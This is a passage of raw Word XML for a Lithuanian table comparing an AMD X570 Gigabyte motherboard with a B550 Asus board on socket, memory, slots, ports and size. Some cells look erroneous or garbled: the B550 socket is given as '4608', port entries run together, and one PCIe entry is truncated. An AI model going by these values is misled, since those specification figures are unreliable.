                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>AMD® X570</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="57456FC1" w14:textId="6B8ED388" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>AMD® B550</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="0C211567" w14:textId="77777777" w:rsidTr="00750DF8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="396F70F2" w14:textId="6FABF48E" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Gamintojas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2FADCDE2" w14:textId="65EAD002" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Gigabyte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2FF4A024" w14:textId="6D0E0CCB" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Asus</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="317EA3FD" w14:textId="77777777" w:rsidTr="00750DF8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="244154DF" w14:textId="5EC4EFB6" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Procesorius</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5963EFBF" w14:textId="327F5DAA" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>AMD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="12376C8C" w14:textId="2F6EAE1B" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>AMD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="1367725D" w14:textId="77777777" w:rsidTr="00750DF8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1D4E0E68" w14:textId="1EE0266F" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Procesoriaus lizdas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="71FF6DF6" w14:textId="07F4E4D2" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>AM4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5DF4CF31" w14:textId="434CAEF5" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>4608</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="4D17D5DE" w14:textId="77777777" w:rsidTr="00750DF8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="11A041CB" w14:textId="6AE01184" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Operatyviosios atminties lizdų kiekis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="55278673" w14:textId="02CBBDE7" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3F4E50F8" w14:textId="751F85CE" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="7357975A" w14:textId="77777777" w:rsidTr="00750DF8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5D5B30BC" w14:textId="07EBB92E" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Operatyviosios atminties tipas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="605AF982" w14:textId="4E814D31" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>DDR4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="42B69E63" w14:textId="5488BCC8" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>DDR4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="40AC0BFE" w14:textId="77777777" w:rsidTr="00750DF8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0B5881CD" w14:textId="77208A96" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Maksimalus operatyviosios atminties kiekis (RAM)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="26D4EE28" w14:textId="1E32F903" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>128 GB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1DA4E7AB" w14:textId="3E97DB1F" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>128 GB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="3DD6DF1C" w14:textId="77777777" w:rsidTr="00750DF8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="42FB5458" w14:textId="4E17C2FC" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Operatyviosios atminties taktinis dažnis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="460FAD64" w14:textId="311DF7BD" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>4300+ MHz (O.C.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="66AB66BD" w14:textId="20F964C0" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>4600+ MHz (O.C.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="5C84C944" w14:textId="77777777" w:rsidTr="00750DF8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="52D413D7" w14:textId="58163147" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Išplėtimo lizdai </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2AF23ED0" w14:textId="0E41CCC2" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>PCIe 4.0 x16 x1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07B068F2" w14:textId="41FEE784" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>PCIe 4.0 x1 x2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="654D62CB" w14:textId="3C7E6295" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>PCIe 4.0 x16 x</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="141C1EEB" w14:textId="77777777" w:rsidTr="00750DF8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="041118A1" w14:textId="1FF65D9C" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Galimos galinės dalies jungtys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2B11CCF2" w14:textId="447D6ACC" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>USB 2.0 x4, USB 3.xHDMI x 6.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="13EC4607" w14:textId="77777777" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>USB 2.0 x4, USB 3.xHDMI x 6.2x DisplayPort</w:t>
            </w:r>
            <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>x 1.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="682768B5" w14:textId="743AEEE9" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="585D7321" w14:textId="77777777" w:rsidTr="00750DF8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3F8C92AF" w14:textId="12A3B319" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Kietojo disko ir optinių įrenginių pajungimas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="747F29CC" w14:textId="1BF10EFD" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>SATA 3 x 6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="160C0ACE" w14:textId="122B8CA0" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>SATA 3 x 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="517FE23A" w14:textId="77777777" w:rsidTr="00750DF8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="08936D90" w14:textId="7441F7AB" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Pagrindinės plokštės matmenys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2A6523FB" w14:textId="591B7432" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Ilgis 244 mm</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="465E9744" w14:textId="77777777" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Plotis 305 mm</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37A8133C" w14:textId="6A4724E0" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
